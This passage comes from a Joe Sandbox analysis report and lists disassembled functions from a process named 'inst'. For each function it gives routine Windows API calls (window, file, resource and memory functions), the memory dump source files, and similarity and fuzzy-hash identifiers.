                                                                                                                                                                                                                        • Part of subcall function 00AC2E1E: CallWindowProcW.USER32(?,?,?,?,?), ref: 00AC2E30
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Long$CallProc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 513923721-0
                                                                                                                                                                                                                      • Opcode ID: c84ca98e9a2818fa8d27bebf23d1de04c9f674d1ee7ad460a8e56f55eb2e4a67
                                                                                                                                                                                                                      • Instruction ID: c9f1f5b124f69f09cdbae73760d168ad58ebda9b4a4e84dcb44cd434a4b80eab
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c84ca98e9a2818fa8d27bebf23d1de04c9f674d1ee7ad460a8e56f55eb2e4a67
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7313771500609AFCF21DF69C880E9ABBF5FF58720B14891DF866A72A0D730E951DFA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000FC), ref: 00AB3F74
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000FC), ref: 00AB3F9B
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,?), ref: 00AB3FAA
                                                                                                                                                                                                                        • Part of subcall function 00AB3EE0: CallWindowProcW.USER32(?,?,?,?,?), ref: 00AB3EF2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Long$CallProc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 513923721-0
                                                                                                                                                                                                                      • Opcode ID: c84ca98e9a2818fa8d27bebf23d1de04c9f674d1ee7ad460a8e56f55eb2e4a67
                                                                                                                                                                                                                      • Instruction ID: 1ea06a78bb4e8c45a688bb1bfef79ac66e32680b3bdd18294772a99e397d7a01
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c84ca98e9a2818fa8d27bebf23d1de04c9f674d1ee7ad460a8e56f55eb2e4a67
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE317E72600605AFCF20DF69CC84DAABBF9FF48310B108519F85A9B2A1D731EA51DF90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Rect$ClientH_prolog3Offset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 236044050-0
                                                                                                                                                                                                                      • Opcode ID: 07b06d92d468cb167f77186f9378c380bd205e2a4cfa40b3e71e261cb64a3cd6
                                                                                                                                                                                                                      • Instruction ID: 407ab49157743c97e5f3c6e5fb5e1476dcea9b1c212a9c2c39e670dab934339a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07b06d92d468cb167f77186f9378c380bd205e2a4cfa40b3e71e261cb64a3cd6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0021C276A0021AEFCB01DFE8D9859EEBBBAFF49310F10401AF515A7211D771AA51CFA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD8838
                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00AD8845
                                                                                                                                                                                                                        • Part of subcall function 00AFEDC6: __wsplitpath_helper.LIBCMT ref: 00AFEE08
                                                                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AD8874
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DiskFreeSpace__wsplitpath__wsplitpath_helper_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1401654830-0
                                                                                                                                                                                                                      • Opcode ID: 5e220a4a4a3e365103fca6f04212f1631e256a1439f91968605e1979b73c017a
                                                                                                                                                                                                                      • Instruction ID: c4df6f264b7157b16924c9e48adf688c46f3b43ce216f1d890fbadbe8a6da15b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e220a4a4a3e365103fca6f04212f1631e256a1439f91968605e1979b73c017a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C221CC7291030C9FDB61DFE8DC859EEB7BDAF09344F10452AA519EB211EB30A909CB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ABECF7
                                                                                                                                                                                                                        • Part of subcall function 00ABB33C: KillTimer.USER32(?,00002710), ref: 00ABB344
                                                                                                                                                                                                                        • Part of subcall function 00ABEC81: GetModuleHandleW.KERNEL32(?), ref: 00ABEC97
                                                                                                                                                                                                                        • Part of subcall function 00ABEC81: FindResourceW.KERNEL32(?,?,?), ref: 00ABECA8
                                                                                                                                                                                                                        • Part of subcall function 00ABEC81: SizeofResource.KERNEL32(?,00000000), ref: 00ABECB7
                                                                                                                                                                                                                        • Part of subcall function 00ABEC81: LoadResource.KERNEL32(?,00000000), ref: 00ABECC1
                                                                                                                                                                                                                        • Part of subcall function 00ABEC81: LockResource.KERNEL32(00000000), ref: 00ABECC8
                                                                                                                                                                                                                      • GetParent.USER32(000000FF), ref: 00ABEDA8
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000BD0,00000000,00000000), ref: 00ABEDB8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindH_prolog3HandleKillLoadLockMessageModuleParentSendSizeofTimer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3209458795-0
                                                                                                                                                                                                                      • Opcode ID: 2ec346e1550482d0b303c31b45c60a7e017707087b7e9d04ad37928bdc42d3d2
                                                                                                                                                                                                                      • Instruction ID: 77ea02e9efac705c96277e162ba2b494146d2fcbffb470d7da04e1aa91b06341
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ec346e1550482d0b303c31b45c60a7e017707087b7e9d04ad37928bdc42d3d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F921A1717107099BDF10EF748D16BEE77EAAF44300F000419B926EB292DBB4DA119B41
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 00AA5B74
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00AA5B81
                                                                                                                                                                                                                        • Part of subcall function 00AF5674: __FF_MSGBANNER.LIBCMT ref: 00AF5697
                                                                                                                                                                                                                        • Part of subcall function 00AF5674: __NMSG_WRITE.LIBCMT ref: 00AF569E
                                                                                                                                                                                                                        • Part of subcall function 00AF5674: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00B005A7,?,00000001,?,?,00B03329,00000018,00B4EF60,0000000C,00B033BA), ref: 00AF56EB
                                                                                                                                                                                                                      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000,00000000,?,00000000), ref: 00AA5B97
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddrTable$AllocateHeap_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3107517213-0
                                                                                                                                                                                                                      • Opcode ID: b84d7aabba434da8548ce5c629f9729aa0f465e2a5f3cfdcf657c701a86e8fc1
                                                                                                                                                                                                                      • Instruction ID: e46184e19923269d49fde4b321a18fe0b4f3f03f91398a72455612feef5bad9b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b84d7aabba434da8548ce5c629f9729aa0f465e2a5f3cfdcf657c701a86e8fc1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB01C472D00518AFDB229FB9DCC19FEB3ACAB06752B2004AAF54193080F7749E809778
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A9F32D
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,00000000,00B3E544,0000005C,00000008), ref: 00A9F37D
                                                                                                                                                                                                                      • SHCreateDirectory.SHELL32(00000000,?), ref: 00A9F389
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateDirectoryExistsFileH_prolog3Path
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2789380810-0
                                                                                                                                                                                                                      • Opcode ID: d93736486dfa4149ba310ca4e3defcaf88d8b56183b2efdf60c5070a1f7873b0
                                                                                                                                                                                                                      • Instruction ID: 47d2bf26dfa64cf92e55baf36df7f71b608ef339f345bc9f3680aacee200db2f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d93736486dfa4149ba310ca4e3defcaf88d8b56183b2efdf60c5070a1f7873b0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6115131A015099FCF14EFA4C995AFE77A4AF10350F048429F525AB282DB34DA46CB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,?,00000080,00000000,?,00AA8D5A,00000000,?,00AE68E0,?,00000000,00000000,00000748), ref: 00AE6C90
                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00AE6CB1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile_wcsncpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4108816585-0
                                                                                                                                                                                                                      • Opcode ID: 9b0629cafb1561917a488a738bd3f921bb03018e32ff2991946b93560dd220ec
                                                                                                                                                                                                                      • Instruction ID: 770ef538ca837b70751273de3dd4f5fc484829271edaa7b8874bfdab9d3d184b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b0629cafb1561917a488a738bd3f921bb03018e32ff2991946b93560dd220ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25014C316402547AD7306F738D45FAF377CEBE4BD5F208C26FA4597140D57085408260
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A8CE75
                                                                                                                                                                                                                        • Part of subcall function 00A8CBDE: _wcslen.LIBCMT ref: 00A8CBEF
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00A8CEE2
                                                                                                                                                                                                                      • GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 00A8CEF9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3_LongNamePath_memset_wcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3807393607-0
                                                                                                                                                                                                                      • Opcode ID: 45f1c5146a1877608bacc3199e7ee86791282ea8e42987168b3be747e2453c98
                                                                                                                                                                                                                      • Instruction ID: 8d8120b7caa39e8bc94d4070c8676efff11f6732bdcb326512de809ac6f1e7fe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45f1c5146a1877608bacc3199e7ee86791282ea8e42987168b3be747e2453c98
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64019271A9061C6BDB10FB54CD4EBEE72B9AF14712F004089F1089B292DBB45F458FE5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00AC2FE5
                                                                                                                                                                                                                        • Part of subcall function 00AAD649: BeginPaint.USER32(?,?), ref: 00AAD65B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00AC3038
                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00AC3045
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Paint$BeginH_prolog3_Window
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4095823405-0
                                                                                                                                                                                                                      • Opcode ID: d94abdb448e4e1e75c1ae64aa7aad9a36dd3997f96cfc5fd8c2a2d7bca6692b4
                                                                                                                                                                                                                      • Instruction ID: 9b45a099b4c1a0c578ea1d02070f77c9e3a20d50cdc5802db52bfa7578c66e02
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d94abdb448e4e1e75c1ae64aa7aad9a36dd3997f96cfc5fd8c2a2d7bca6692b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC0108B290060DAFDF219FD1CD85DEEBBBAFF04308B404429B616AA560D671AD158B10
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00A72744,?), ref: 00A72784
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A727CD
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A727D7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandle$CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1378612225-0
                                                                                                                                                                                                                      • Opcode ID: 2700766cf5d0b215db0b3e6b7bed8a6d45a4313aaef3f3657cc6047ddd48863d
                                                                                                                                                                                                                      • Instruction ID: 3b2c1329d61769605af2f2bd696717d0230669ce57b7f65c910f75da7fa71892
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2700766cf5d0b215db0b3e6b7bed8a6d45a4313aaef3f3657cc6047ddd48863d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDF02E3278031077E73063747E4AFC62A859B94B31F25C524FA19BB2C4F9B19C424399
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00AE059E,?,00B5CDA4,?,00AE059E,?), ref: 00AE0323
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00AE059E,C0000000,00000001,00000000,00000001,00000080,00000000,?,00AE059E,?), ref: 00AE033E
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00AE0367
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateDeleteHandle
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3273607511-0
                                                                                                                                                                                                                      • Opcode ID: 45d5d60904320155d5e5a510c7fb1ec5ac11829b2dc9cf88a4d5006a8bf40cc9
                                                                                                                                                                                                                      • Instruction ID: bc761502461a99a3b32adc0ae8468da93265e7c7394816e16364853dd92a00f1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45d5d60904320155d5e5a510c7fb1ec5ac11829b2dc9cf88a4d5006a8bf40cc9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28F0E232200204BBEB315B62DC05FEA3E69DB44B72F008424FA259B0D0DAB2E09197A8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 6C68DF4E
                                                                                                                                                                                                                        • Part of subcall function 6C68D47E: __FF_MSGBANNER.LIBCMT ref: 6C68D4A1
                                                                                                                                                                                                                        • Part of subcall function 6C68D47E: __NMSG_WRITE.LIBCMT ref: 6C68D4A8
                                                                                                                                                                                                                        • Part of subcall function 6C68D47E: RtlAllocateHeap.NTDLL(00000000,6C68DF44,?,?,?,?,6C68DF53,?), ref: 6C68D4F5
                                                                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 6C68DF71
                                                                                                                                                                                                                        • Part of subcall function 6C68DF19: std::exception::exception.LIBCMT ref: 6C68DF25
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 6C68DF93
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
